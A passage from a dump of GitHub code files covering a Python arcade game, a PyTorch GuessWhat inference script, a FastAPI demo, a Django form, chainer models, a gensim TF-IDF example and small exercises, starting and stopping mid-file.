self.BB8.center_y = 400\n self.player_list.append(self.BB8)\n\n for i in range(trooper_count):\n trooper = Trooper()\n trooper.center_x = random.randrange(trooper.w,SW-trooper.w)\n trooper.center_y = random.randrange(trooper.h+90,SH)\n self.trooper_list.append(trooper)\n\n def newplat(self):\n print(\"new plat\")\n offset = random.randrange(0,SW-300)\n for i in range(int(300 / 32)): #Upper Platform\n self.floor = World(\"game_assets/worldtiles/grass.png\")\n self.floor.center_x = (32 / 2) + (32 * i) + offset\n self.floor.center_y = SH + 20\n self.worldlist.append(self.floor)\n\n def newcoin(self):\n print(\"new coin\")\n coin = Trooper()\n coin.center_y = SH + 20\n coin.center_x = random.randrange(10,SW-10)\n self.trooper_list.append(coin)\n\n\n\n def on_draw(self):\n arcade.start_render()\n\n for obj in self.backlist:\n obj.drawmount()\n\n self.worldlist.draw()\n\n self.trooper_list.draw()\n self.player_list.draw()\n\n arcade.draw_rectangle_filled(SW/2,5,SW,30,arcade.color.BLACK)\n output = f\"Score: {self.score}\"\n timeremaining = f\"Time Left: {LevelTime:.2f}\"\n arcade.draw_text(output,10,1, arcade.color.WHITE, 14)\n arcade.draw_text(timeremaining, 100, 1, arcade.color.WHITE, 14)\n\n if LevelTime <= 0:\n arcade.draw_rectangle_filled(SW/2,SH/2,SW,SH,arcade.color.BLACK)\n arcade.draw_text(\"Game Over! \\n Press R to restart\",SW/2,SH/2,arcade.color.WHITE,30,align= \"center\",anchor_x=\"center\",anchor_y= \"center\")\n\n def on_update(self, dt):\n global LevelTime\n\n\n\n self.time +=1\n if self.time == 4:\n self.time = 0\n self.trooper_list.update_animation()\n LevelTime -= (4 / 60)\n\n self.cooldown -= 1\n if self.cooldown < 0:\n self.cooldown = 0\n\n #self.BB8.angle = - 0.5 * (angle(self.BB8.change_x,self.BB8.change_y+8) + 90)\n\n\n\n self.player_list.update()\n self.trooper_list.update()\n\n for obj in self.backlist:\n obj.updatemont()\n obj.x = obj.inx - ( 0.1 * self.BB8.center_x)\n\n trooper_hit_list = arcade.check_for_collision_with_list(self.BB8,self.trooper_list)\n for troop in trooper_hit_list:\n troop.kill()\n self.score +=1\n arcade.play_sound(self.BB8.laser)\n self.newcoin()\n LevelTime += 0.5\n\n for plat in self.worldlist:\n plat.center_y += -1\n if plat.center_y < -20:\n plat.kill()\n if self.cooldown < 1:\n self.newplat()\n self.cooldown += 60\n\n for coin in self.trooper_list:\n if coin.center_y < -20:\n coin.kill()\n self.newcoin()\n\n\n\n #logic for detecting if player is on the ground\n groundcheck = arcade.check_for_collision_with_list(self.BB8,self.worldlist)\n if self.BB8.change_y < 0.1:\n if groundcheck:\n for obj in groundcheck:\n if abs(obj.top - self.BB8.bottom) < 7:\n self.BB8.bottom = obj.top -2\n\n self.BB8.grounded = True\n if not groundcheck:\n self.BB8.grounded = False\n\n\n\n\n def on_key_press(self, symbol, modifiers: int):\n print(symbol)\n # if symbol ==119:\n # self.BB8.change_y = SP\n #\n # if symbol ==115:\n # self.BB8.change_y = -SP\n\n if symbol ==97:\n self.BB8.slowing = False\n self.BB8.change_x = -SP\n\n if symbol ==100:\n self.BB8.slowing = False\n self.BB8.change_x = SP\n\n if symbol == 32:\n if self.BB8.grounded == True:\n self.BB8.center_x += 1\n self.BB8.change_y = 6\n self.BB8.grounded = False\n if symbol == 114:\n if LevelTime <= 0:\n self.reset()\n\n def on_key_release(self, symbol: int, modifiers: int):\n #print(symbol)\n # if symbol ==119:\n # self.BB8.change_y = 0\n #\n # if symbol ==115:\n # self.BB8.change_y = 0\n\n if symbol ==97:\n if self.BB8.change_x < 0:\n self.BB8.slowing = True\n\n if symbol ==100:\n if self.BB8.change_x > 0:\n self.BB8.slowing = True\n\n\n\n\n\n\n#-----Main Function--------\ndef main():\n window = MyGame(SW,SH,\"Endless Platforms\")\n window.reset()\n arcade.run()\n\n#------Run Main Function-----\nif __name__ == \"__main__\":\n main()","repo_name":"MitchellDan/Chs.15-21_Game-Design","sub_path":"15.1_Game.py","file_name":"15.1_Game.py","file_ext":"py","file_size_in_byte":11709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"8135612485","text":"import planet as p\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nsunce_zemlja = p.Planet(np.array([1.496*10**(11), 0]), np.array([0.1, 0.1]), np.array([0, 29783]), np.array([0, 0]), np.array([0, 0]), np.array([0, 0]), 5.9742*10**(24), 1.989*10**(30))\n # r1, r2, v1, v2, a1, a2, m1, m2\nx1, y1, x2, y2 = sunce_zemlja.range(100)\n\nplt.figure(figsize=(5.5, 5.5))\nplt.plot(x1, y1)\nplt.plot(x2, y2)\nplt.legend([\"Zemlja\", \"Sunce\"])\nplt.title(\"x-y graf\")\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.show()","repo_name":"dkusanovi/PAF","sub_path":"Vjezbe/Vjezbe_11/zadatak_1.py","file_name":"zadatak_1.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16779954379","text":"import argparse\nimport torch\nimport logging\nfrom torchvision.models import vgg16\nfrom multiprocessing import cpu_count\nfrom torch.utils.data import DataLoader\nfrom collections import OrderedDict, defaultdict\n\nimport utils\nfrom dataset import GuessWhatDataset\nfrom models import QGen, Guesser, Oracle, DM1, DM2\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ntorch.set_printoptions(profile='full')\n\ndef main(args):\n\n print(args)\n\n logging.basicConfig(filename='inference_%s_%i.log'%(args.mode, args.max_num_questions),level=logging.INFO)\n\n splits = (['train'] if args.train_set else list()) + ['valid'] + (['test'] if args.test_set else list())\n\n datasets = OrderedDict()\n for split in splits:\n datasets[split] = GuessWhatDataset(\n split=split,\n data_dir=args.data_dir,\n model='inference',\n coco_dir=args.coco_dir,\n successful_only=False,\n min_occ=args.min_occ,\n max_sequence_length=args.max_sequence_length,\n h5File='vgg_fc8.hdf5',\n mapping_file='imagefile2id.json')\n\n\n qgen = QGen(\n num_embeddings=datasets['valid'].vocab_size,\n embedding_dim=args.qgen_embedding_dim,\n hidden_size=args.qgen_hidden_size,\n visual_embedding_dim=args.qgen_visual_embedding_dim,\n padding_idx=datasets['valid'].pad\n )\n qgen.to(device)\n qgen.load_state_dict(torch.load('bin/qgenX.pt', map_location=lambda storage, loc: storage))\n\n # vgg = vgg16(pretrained=True)\n # vgg.eval()\n # vgg.to(device)\n\n guesser = Guesser(\n num_word_embeddings=datasets['valid'].vocab_size,\n word_embedding_dim=args.guesser_word_embedding_dim,\n hidden_size=args.guesser_hidden_size,\n num_cat_embeddings=datasets['valid'].num_categories,\n cat_embedding_dim=args.guesser_cat_embedding_dim,\n mlp_hidden=args.guesser_mlp_hidden\n )\n guesser.to(device)\n guesser.load_state_dict(torch.load('bin/guesser.pt', map_location=lambda storage, loc: storage))\n\n\n oracle = Oracle(\n num_word_embeddings=datasets['valid'].vocab_size,\n word_embedding_dim=args.oracle_word_embedding_dim,\n hidden_size=args.oracle_hidden_size,\n num_cat_embeddings=datasets['valid'].num_categories,\n cat_embedding_dim=args.oracle_cat_embedding_dim,\n mlp_hidden=args.oracle_mlp_hidden\n )\n oracle.to(device)\n oracle.load_state_dict(torch.load('bin/oracle.pt', map_location=lambda storage, loc: storage))\n\n\n if args.mode == 'dm1':\n dm = DM1(\n rnn_hidden_size=args.qgen_hidden_size,\n attention_hidden=512\n )\n dm.load_state_dict(torch.load('bin/dm1_nomask128.pt', map_location=lambda storage, loc: storage))\n\n elif args.mode == 'dm2':\n dm = DM2()\n dm.load_state_dict(torch.load('bin/dm2.pt', map_location=lambda storage, loc: storage))\n\n if args.mode != 'baseline':\n dm.to(device)\n dm.eval()\n\n\n torch.no_grad()\n\n logs = defaultdict(lambda: defaultdict(float))\n\n for split in splits:\n\n data_loader = DataLoader(\n dataset=datasets[split],\n batch_size=args.batch_size,\n num_workers=args.num_workers\n )\n\n for iteration, sample in enumerate(data_loader):\n\n for k, v in sample.items():\n if torch.is_tensor(v):\n sample[k] = v.to(device)\n\n dialogue = sample['input'].clone()\n dialogue_lengths = sample['input'].new_zeros(sample['input'].size(0))\n\n fc8 = sample['image']\n\n # get first question\n questions, questions_lengths, h, c, hidden_states = qgen.inference(\n sample['input'],\n fc8=fc8,\n end_of_question_token=datasets['valid'].w2i[''],\n hidden=None,\n strategy=args.strategy\n )\n\n B = sample['input'].size(0)\n idx = sample['input'].new_tensor(list(range(B))).long()\n running_idx = sample['input'].new_tensor(list(range(B))).long()\n mask_current = sample['input'].new_ones((B)).byte()\n\n target_category = sample['target_category']\n target_spatial = sample['target_spatial']\n categories = sample['categories']\n bboxes = sample['bboxes']\n\n answer_logits = sample['input'].new_empty((B, 3)).float()\n\n if args.mode != 'baseline':\n num_questions_asked = sample['input'].new_ones(B)\n\n for qi in range(1, args.max_num_questions+1):\n\n # add question to dialogue\n dialogue = append_to_padded_sequence(\n padded_sequence=dialogue,\n sequence_lengths=dialogue_lengths,\n appendix=questions,\n appendix_lengths=questions_lengths,\n mask_current=mask_current\n )\n\n dialogue_lengths[running_idx] += questions_lengths\n\n # get answers\n answer_logits = oracle.forward(\n question=questions,\n length=questions_lengths,\n target_category=target_category[running_idx],\n target_spatial=target_spatial[running_idx]\n )\n answers = answer_logits.topk(1)[1].long()\n answers = answer_class_to_token(answers, datasets['valid'].w2i)\n\n # add answers to dialogue\n dialogue = append_to_padded_sequence(\n padded_sequence=dialogue,\n sequence_lengths=dialogue_lengths,\n appendix=answers,\n appendix_lengths=answers.new_ones(answers.size(0)),\n mask_current=mask_current\n )\n dialogue_lengths[running_idx] += 1\n\n\n # ask next question\n questions, questions_lengths, h[:, running_idx], c[:, running_idx], next_hidden_states = qgen.inference(\n input=answers,\n fc8=fc8[running_idx],\n end_of_question_token=datasets['valid'].w2i[''],\n hidden=(h[:, running_idx], c[:, running_idx]),\n strategy=args.strategy\n )\n\n\n if args.mode == 'dm1':\n\n # add hidden state from answer\n hidden_states_incl_answer = append_to_padded_sequence(\n padded_sequence=hidden_states,\n sequence_lengths=dialogue_lengths,\n appendix=next_hidden_states,\n appendix_lengths=dialogue_lengths.new_ones((B)),\n mask_current=mask_current\n )\n\n # update hidden states to include all hidden states of next question\n hidden_states = append_to_padded_sequence(\n padded_sequence=hidden_states,\n sequence_lengths=dialogue_lengths,\n appendix=next_hidden_states,\n appendix_lengths=questions_lengths,\n mask_current=mask_current\n )\n\n dm_logits = dm(\n hidden_states=hidden_states_incl_answer[running_idx],\n lengths=dialogue_lengths[running_idx]+1,\n fc8=fc8[running_idx],\n masking=False\n )\n\n\n elif args.mode == 'dm2':\n object_logits, guesser_hidden_states = guesser(\n sequence=dialogue[running_idx],\n sequence_length=dialogue_lengths[running_idx],\n objects=categories[running_idx],\n spatial=bboxes[running_idx],\n return_hidden=True\n )\n\n dm_logits = dm(\n hidden_states=guesser_hidden_states,\n fc8=fc8[running_idx],\n )\n\n if args.mode != 'baseline':\n decision_logits, decisions = torch.max(dm_logits, 1)\n\n # update running idx\n mask_previous = mask_current.clone()\n mask_current[running_idx] = (decisions != 1)\n if mask_current.sum() > 0 and qi < args.max_num_questions:\n running_idx = idx.masked_select(mask_current)\n num_questions_asked[running_idx] += 1\n\n # remove stopped questions\n _, qS = questions.size()\n running_questions = questions.new_zeros(B, qS)\n running_questions.masked_scatter_(mask_previous.unsqueeze(1).repeat(1, qS), questions)\n running_questions = running_questions[mask_current]\n questions = running_questions\n\n running_questions_lengths = questions_lengths.new_zeros(B)\n running_questions_lengths.masked_scatter_(mask_previous, questions_lengths)\n running_questions_lengths = running_questions_lengths[mask_current]\n questions_lengths = running_questions_lengths\n\n else:\n break\n\n object_logits = guesser(\n sequence=dialogue,\n sequence_length=dialogue_lengths,\n objects=sample['categories'],\n spatial=sample['bboxes']\n )\n\n acc = utils.accuracy(predictions=object_logits, targets=sample['target'])\n logs[split]['running_acc'] += 1/(iteration+1) * (acc - logs[split]['running_acc'])\n\n if args.mode != 'baseline':\n logs[split]['avg_num_questions'] += 1/(iteration+1) * (torch.mean(num_questions_asked.float()).item() - logs[split]['avg_num_questions'])\n\n # bookkeeping\n if iteration % args.print_every == 0 or iteration+1 == len(data_loader):\n if args.mode != 'baseline':\n s = \"Running-Mean-No-Questions %.3f\"%(logs[split]['avg_num_questions'])\n else:\n s = \"\"\n print(\"%s Batch %04d/%04d Batch-Acc %.3f Running-Mean-Acc %.3f %s\"\n %(split.upper(), iteration, len(data_loader)-1, acc, logs[split]['running_acc'], s))\n\n\n\n logging.info(\"++++++++++%s++++++++++\"%split.upper())\n logging.info(\"Set Accuracy %.5f (MQ=%i)\"%(logs[split]['running_acc'] * 100, args.max_num_questions))\n if args.mode != 'baseline':\n logging.info(\"Avg. Number of Questions %.3f\"%(logs[split]['avg_num_questions']))\n logging.info(\"++++++++++%s++++++++++\"%('+'*len(split)))\n\ndef append_to_padded_sequence(padded_sequence, sequence_lengths, appendix, appendix_lengths, mask_current):\n\n assert mask_current.sum().item() == appendix.size(0)\n\n sequence = list()\n lengths = list()\n\n # get the max length of the new sequences\n appendix_lengths_padded = appendix_lengths.new_zeros(padded_sequence.size(0))\n appendix_lengths_padded.masked_scatter_(mask_current, appendix_lengths)\n appended_sequences_lengths = sequence_lengths + appendix_lengths_padded\n max_length = torch.max( appended_sequences_lengths )\n\n mi = 0\n for si in range(padded_sequence.size(0)):\n\n # if dialogue is still running, add item from appendix\n if mask_current[si] == 1:\n # remove padding from padded_sequence; remove padding from appendix; concate both\n sequence.append( torch.cat( (padded_sequence[si, :sequence_lengths[si]], appendix[mi, :appendix_lengths[mi]]), dim=0) )\n mi += 1\n else:\n sequence.append(padded_sequence[si, :sequence_lengths[si]])\n\n lengths.append(len(sequence[-1]))\n\n # pad new sequence up to max_length\n pad = sequence[-1].new_zeros( ( (max_length-lengths[-1]), *list(sequence[-1].size()[1:])) )\n sequence[-1] = torch.cat( (sequence[-1], pad) )\n\n\n sequence = torch.stack(sequence)\n return sequence\n\ndef answer_class_to_token(answers, w2i):\n\n yes_mask = answers == 0\n no_mask = answers == 1\n na_mask = answers == 2\n\n answers.masked_fill_(yes_mask, w2i[''])\n answers.masked_fill_(no_mask, w2i[''])\n answers.masked_fill_(na_mask, w2i[''])\n\n return answers\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n\n # Dataset Settings\n parser.add_argument('-d', '--data_dir', type=str, default='data')\n parser.add_argument('-cd', '--coco_dir', type=str, default='/Users/timbaumgartner/MSCOCO')\n parser.add_argument('-mo', '--min_occ', type=int, default=3)\n parser.add_argument('-ms', '--max_sequence_length', type=int, default=100)\n\n # Experiment Settings\n parser.add_argument('-m', '--mode', type=str, choices=['baseline', 'dm1', 'dm2'], default='baseline')\n parser.add_argument('-mq', '--max_num_questions', type=int, default=5)\n parser.add_argument('-b', '--batch_size', type=int, default=32)\n parser.add_argument('-nw', '--num_workers', type=int, default=2)\n parser.add_argument('-v', '--print_every', type=int, default=100)\n parser.add_argument('-train', '--train_set', action='store_true')\n parser.add_argument('-test', '--test_set', action='store_true')\n\n\n # Hyperparameter\n parser.add_argument('--qgen_embedding_dim', type=int, default=512)\n parser.add_argument('--qgen_hidden_size', type=int, default=1024)\n parser.add_argument('--qgen_visual_embedding_dim', type=int, default=512)\n parser.add_argument('--strategy', type=str, choices=['greedy', 'sampling'], default='greedy')\n\n parser.add_argument('--guesser_word_embedding_dim', type=int, default=512)\n parser.add_argument('--guesser_hidden_size', type=int, default=512)\n parser.add_argument('--guesser_cat_embedding_dim', type=int, default=256)\n parser.add_argument('--guesser_mlp_hidden', type=int, default=512)\n\n parser.add_argument('--oracle_word_embedding_dim', type=int, default=300)\n parser.add_argument('--oracle_hidden_size', type=int, default=512)\n parser.add_argument('--oracle_cat_embedding_dim', type=int, default=512)\n parser.add_argument('--oracle_mlp_hidden', type=int, default=128)\n\n parser.add_argument('--dm_mlp_hidden', type=int, default=512)\n\n args = parser.parse_args()\n args.num_workers = min(cpu_count(), args.num_workers)\n\n main(args)\n","repo_name":"shekharRavi/ask-no-more-COLING2018","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":14680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"14550646474","text":"from fastapi import FastAPI\r\n\r\napp = FastAPI()\r\n\r\n@app.get(\"/\")\r\nasync def root():\r\n return {\"greeting\":\"Hello world\"}\r\n\r\n@app.get(\"/users/{user_id}\")\r\nasync def user(user_id: str):\r\n return {\"user_id\":user_id}\r\n\r\n@app.get(\"/getUserInfo\")\r\ndef getUserInfo(id: int, name: str):\r\n return [{\r\n \"id\" : id,\r\n \"firstName\" : name\r\n }]\r\n","repo_name":"Rambabu1969/fastapi","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40681131619","text":"def roman(number):\n number_inv = str(number)[::-1]\n\n uni = {\"0\": \"\",\n \"1\": \"I\",\n \"2\": \"II\",\n \"3\": \"III\",\n \"4\": \"IV\",\n \"5\": \"V\",\n \"6\": \"VI\",\n \"7\": \"VII\",\n \"8\": \"VIII\",\n \"9\": \"IX\"}\n \n dez = {}\n cen = {}\n mil = {}\n for n in uni:\n dez[n] = uni[n].replace(\"X\", \"C\").replace(\"I\", \"X\").replace(\"V\", \"L\")\n cen[n] = uni[n].replace(\"X\", \"M\").replace(\"I\", \"C\").replace(\"V\", \"D\")\n mil[n] = uni[n].replace(\"I\", \"M\").replace(\"V\", \"V-\")\n\n romano = []\n for n, i in enumerate(number_inv):\n if n == 0:\n romano.append(uni[i])\n elif n == 1:\n romano.append(dez[i])\n elif n == 2:\n romano.append(cen[i])\n else:\n romano.append(mil[i])\n\n return \"\".join(reversed(romano))\n","repo_name":"pedronora/exercism-python","sub_path":"roman-numerals/roman_numerals.py","file_name":"roman_numerals.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10696051230","text":"from django import forms\nfrom .models import Movie\n\nclass MovieForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.label_suffix = \"\" \n GENRE_A = '코미디'\n GENRE_B = '공포'\n GENRE_C = '로맨스'\n GENRE_CHOICES = [\n (\"\", 'Please Choose the Genre'),\n (GENRE_A, '코미디'),\n (GENRE_B, '공포'),\n (GENRE_C, '로맨스'),\n ]\n \n title = forms.CharField(\n label=\"Title\",\n widget=forms.TextInput(\n attrs={\n 'placeholder': \"Title\",\n \"class\":\"form-control\" \n }\n ),\n )\n audience = forms.IntegerField(\n label=\"Audience\",\n widget=forms.NumberInput(\n attrs={\n 'placeholder': 'audience',\n \"class\":\"form-control\" \n }\n )\n )\n release_date = forms.DateTimeField(\n label=\"Release date\",\n widget=forms.DateInput(\n attrs={\n 'type':'date',\n \"class\":\"form-control\" \n }\n )\n )\n genre = forms.ChoiceField(\n label=\"Genre\",\n choices=GENRE_CHOICES,\n widget=forms.Select(\n attrs={\n \"class\":\"form-select\",\n }\n )\n )\n score = forms.IntegerField(\n label=\"Score\",\n widget=forms.NumberInput(\n attrs={\n 'type': 'number',\n 'placeholder': 'Score',\n \"class\":\"form-control\" ,\n 'max': 5,\n 'min': 0.5,\n 'step':0.5,\n }\n )\n )\n poster_url = forms.CharField(\n label=\"Poster url\",\n widget = forms.TextInput(\n attrs={\n 'placeholder':'Poster url',\n \"class\":\"form-control\" ,\n }\n )\n )\n description = forms.CharField(\n label=\"Description\",\n widget=forms.Textarea(\n attrs={\n 'placeholder':'Description',\n \"class\":\"form-control\" \n }\n )\n )\n \n class Meta:\n model = Movie\n fields = ('title', 'audience', 'release_date', 'genre', 'score', 'poster_url', 'description')\n\n ","repo_name":"Eunyeol-Lucas/ssafy-pjt","sub_path":"pjt06/movies/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22699748694","text":"\"\"\"Models\n\"\"\"\nimport numpy as np\nimport chainer\nimport chainer.variable as variable\nfrom chainer.functions.activation import lstm\nfrom chainer import cuda, Function, gradient_check, report, training, utils, Variable\nfrom chainer import datasets, iterators, optimizers, serializers\nfrom chainer import Link, Chain, ChainList\nimport chainer.functions as F\nimport chainer.links as L\nfrom collections import OrderedDict\nimport logging\nimport time\nfrom meta_st.utils import to_device\n\nclass ConvUnit(Chain):\n def __init__(self, imaps, omaps, k=4, s=2, p=1, act=F.relu):\n super(ConvUnit, self).__init__(\n conv=L.Convolution2D(imaps, omaps, ksize=k, stride=s, pad=p, nobias=True),\n bn=L.BatchNormalization(omaps, decay=0.9, use_cudnn=True),\n )\n self.act = act\n \n def __call__(self, h, test=False):\n h = self.conv(h)\n h = self.bn(h, test)\n h = self.act(h)\n return h\n\nclass DeconvUnit(Chain):\n def __init__(self, imaps, omaps, k=4, s=2, p=1, act=F.relu):\n super(DeconvUnit, self).__init__(\n deconv=L.Deconvolution2D(imaps, omaps, ksize=k, stride=s, pad=p, nobias=True),\n bn=L.BatchNormalization(omaps, decay=0.9, use_cudnn=True),\n )\n self.act = act\n \n def __call__(self, h, test=False):\n h = self.deconv(h)\n h = self.bn(h, test)\n h = self.act(h)\n return h\n\nclass Encoder(Chain):\n\n def __init__(self, device=None, act=F.relu):\n \n super(Encoder, self).__init__(\n # ConvBlock0\n conv00=ConvUnit(3, 96, k=3, s=1, p=1),\n conv01=ConvUnit(96, 96, k=3, s=1, p=1),\n conv02=ConvUnit(96, 96, k=3, s=1, p=1),\n bn0=L.BatchNormalization(96),\n # ConvBlock1\n conv10=ConvUnit(96, 192, k=3, s=1, p=1),\n conv11=ConvUnit(192, 192, k=3, s=1, p=1),\n conv12=ConvUnit(192, 192, k=3, s=1, p=1),\n bn1=L.BatchNormalization(192),\n # ConvBlock3\n conv20=ConvUnit(192, 192, k=3, s=1, p=0),\n conv21=ConvUnit(192, 192, k=1, s=1, p=0),\n conv22=ConvUnit(192, 10, k=1, s=1, p=0),\n bn2=L.BatchNormalization(10)\n )\n self.act = act\n self.hiddens = []\n \n def __call__(self, x, test=False):\n self.hiddens = []\n\n h = self.conv00(x, test)\n h = self.conv01(h, test)\n h = self.conv02(h, test)\n h = F.max_pooling_2d(h, (2, 2)) # 32 -> 16\n h = self.bn0(h, test)\n self.hiddens.append(h)\n \n h = self.conv10(h, test)\n h = self.conv11(h, test)\n h = self.conv12(h, test)\n h = F.max_pooling_2d(h, (2, 2)) # 16 -> 8\n h = self.bn1(h, test)\n self.hiddens.append(h)\n \n h = self.conv20(h, test) # 8 -> 6\n self.hiddens.append(h)\n h = self.conv21(h, test)\n h = self.conv22(h, test)\n h = F.average_pooling_2d(h, (6, 6)) # 6 -> 1\n h = self.bn2(h, test)\n h = F.reshape(h, (h.shape[0], np.prod(h.shape[1:])))\n \n return h\n \nclass Decoder(Chain):\n\n def __init__(self, device=None, act=F.relu):\n \n super(Decoder, self).__init__(\n linear=L.Linear(10, 10*6*6),\n bn=L.BatchNormalization(10*6*6),\n\n # ConvBlock0\n conv00=ConvUnit(10, 192, k=1, s=1, p=0),\n conv01=ConvUnit(192, 192, k=1, s=1, p=0),\n deconv02=DeconvUnit(192, 192, k=3, s=1, p=0),\n bn0=L.BatchNormalization(192),\n\n # ConvBlock1\n conv10=ConvUnit(192, 192, k=3, s=1, p=1),\n conv11=ConvUnit(192, 192, k=3, s=1, p=1),\n conv12=ConvUnit(192, 96, k=3, s=1, p=1),\n bn1=L.BatchNormalization(96),\n\n # ConvBlock3\n conv20=ConvUnit(96, 96, k=3, s=1, p=1),\n conv21=ConvUnit(96, 96, k=3, s=1, p=1),\n conv22=ConvUnit(96, 3, k=3, s=1, p=1),\n\n # Unpool (Deconv)\n deconv1=DeconvUnit(192, 192),\n deconv2=DeconvUnit(96, 96),\n )\n self.act = act\n self.hiddens = []\n\n def __call__(self, x, test=False):\n self.hiddens = []\n h = self.linear(x) # 1 -> 6\n h = self.bn(h)\n self.hiddens.append(h)\n h = F.reshape(h, (x.shape[0], 10, 6, 6))\n\n h = self.conv00(h, test)\n h = self.conv01(h, test)\n h = self.deconv02(h, test) # 6 -> 8\n self.hiddens.append(h)\n\n h = self.bn0(h, test)\n h = self.deconv1(h, test) # 8 -> 16\n self.hiddens.append(h)\n h = self.conv10(h, test)\n h = self.conv11(h, test)\n h = self.conv12(h, test)\n\n h = self.bn1(h, test)\n h = self.deconv2(h, test) # 16 -> 32\n self.hiddens.append(h)\n h = self.conv20(h, test) \n h = self.conv21(h, test)\n h = self.conv22(h, test)\n \n return h\n","repo_name":"kzky/works","sub_path":"recon/recon/cifar10/cnn_model_007.py","file_name":"cnn_model_007.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28714214603","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2021/5/11 11:52 上午\n# @Author : sunchao\n\n\n\"\"\"\"python计算TFIDF\"\"\"\nimport jieba\nfrom collections import Counter\n\nfrom gensim import corpora\nfrom gensim.models import Word2Vec, TfidfModel\n\n\n# 准备数据:现有8条文本数据,将8条文本数据放入到list中\ndocuments = [\"1)键盘是用于操作设备运行的一种指令和数据输入装置,也指经过系统安排操作一台机器或设备的一组功能键(如打字机、电脑键盘)\",\n \"2)鼠标称呼应该是“鼠标器”,英文名“Mouse”,鼠标的使用是为了使计算机的操作更加简便快捷,来代替键盘那繁琐的指令。\",\n \"3)中央处理器(CPU,Central Processing Unit)是一块超大规模的集成电路,是一台计算机的运算核心(Core)和控制核心( Control Unit)。\",\n \"4)硬盘是电脑主要的存储媒介之一,由一个或者多个铝制或者玻璃制的碟片组成。碟片外覆盖有铁磁性材料。\",\n \"5)内存(Memory)也被称为内存储器,其作用是用于暂时存放CPU中的运算数据,以及与硬盘等外部存储器交换的数据。\",\n \"6)显示器(display)通常也被称为监视器。显示器是属于电脑的I/O设备,即输入输出设备。它是一种将一定的电子文件通过特定的传输设备显示到屏幕上再反射到人眼的显示工具。\",\n \"7)显卡(Video card,Graphics card)全称显示接口卡,又称显示适配器,是计算机最基本配置、最重要的配件之一。\",\n \"8)cache高速缓冲存储器一种特殊的存储器子系统,其中复制了频繁使用的数据以利于快速访问。\"]\n# 待比较的文档\nnew_doc = \"内存又称主存,是CPU能直接寻址的存储空间,由半导体器件制成。\"\n\nprint('预处理预料,筛掉低频词、语气词')\nstopwords = set()\nprocessed_doc = [[word for word in jieba.cut(item) if word not in stopwords] for item in documents]\n\n# 1、记录语料库中词频大于等于2的词汇构成词典\ncounter = Counter((word for sample in processed_doc for word in sample))\ncounter = dict(filter(lambda xx: xx[1] >= 2, sorted(counter.items(), key=lambda x: x[1], reverse=True)))\nprocessed_doc = [[word for word in item if word in counter] for item in processed_doc]\nfor doc in processed_doc:\n print(doc)\n\n# 2.创建字典(单词与编号之间的映射)\nprint('创建字典(单词与编号之间的映射)')\ndictionary = corpora.Dictionary(processed_doc)\nprint(dictionary)\n# 打印字典,key为单词,value为单词的编号\nprint(dictionary.token2id)\n# dictionary.save('./src/dict4tfidf.dict')\n# dictionary = corpora.Dictionary.load('./src/dict4tfidf.dict')\n\nprint('建立语料库')\n# 将每一篇文档转换为向量\ncorpus = [dictionary.doc2bow(text) for text in processed_doc]\nfor item in corpus:\n print(item)\n\nprint('初始化模型')\n# 初始化一个tfidf模型,可以用它来转换向量(词袋整数计数),表示方法为新的表示方法(Tfidf 实数权重)\ntfidf = TfidfModel(corpus, normalize=False)\ntfidf.save(\"./src/my_model.tfidf\")\n\n# 将整个语料库转为tfidf表示方法\n# 载入模型\ntfidf = TfidfModel.load(\"./src/my_model.tfidf\")\ncorpus_tfidf = tfidf[corpus]\nfor doc in corpus_tfidf:\n print(doc)\n\n\n","repo_name":"sc1054/LR_similarity","sub_path":"gensim_test/gensim_tfidf.py","file_name":"gensim_tfidf.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29923006457","text":"\ndef num_then_char(lst):\n lengths = list(map(len, lst))\n numbers = sorted([num for sublst in lst for num in sublst if type(num) in [int, float]])\n chars = sorted([c for sublst in lst for c in sublst if type(c) == str])\n all = numbers + chars\n res = []\n slice_start = 0\n slice_end = lengths[0]\n for i in range(1, len(lengths)):\n res.append(all[slice_start:slice_end])\n slice_start = slice_end\n slice_end = slice_start + lengths[i]\n # print(\"start=\",slice_start,\"end=\", slice_end,\"i=\",lengths[i])\n res.append(all[slice_start:slice_end])\n return res\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"A52kaKXg42bB7PKHE_18.py","file_name":"A52kaKXg42bB7PKHE_18.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70631670493","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimg = np.ones([250, 600, 3])*255\n\nbloat_grid = np.ones([11,11,3])*225\nbloat_grid[:,:,1:3] = 0\n\n# Drawing the rectangular obstacles\nimg[0:100, 100:150, :] = 0\nimg[-100:-1, 100:150, :] = 0\n\n# Polygon corner points coordinates\nhex_pts = np.array([[300, 200], [300+65, 125+32],\n \t[300+65, 125-32], [300, 50],\n \t[300-65, 125-32], [300-65, 125+32]], np.int32)\n \n \ntri_pts = np.array([[460, 225], 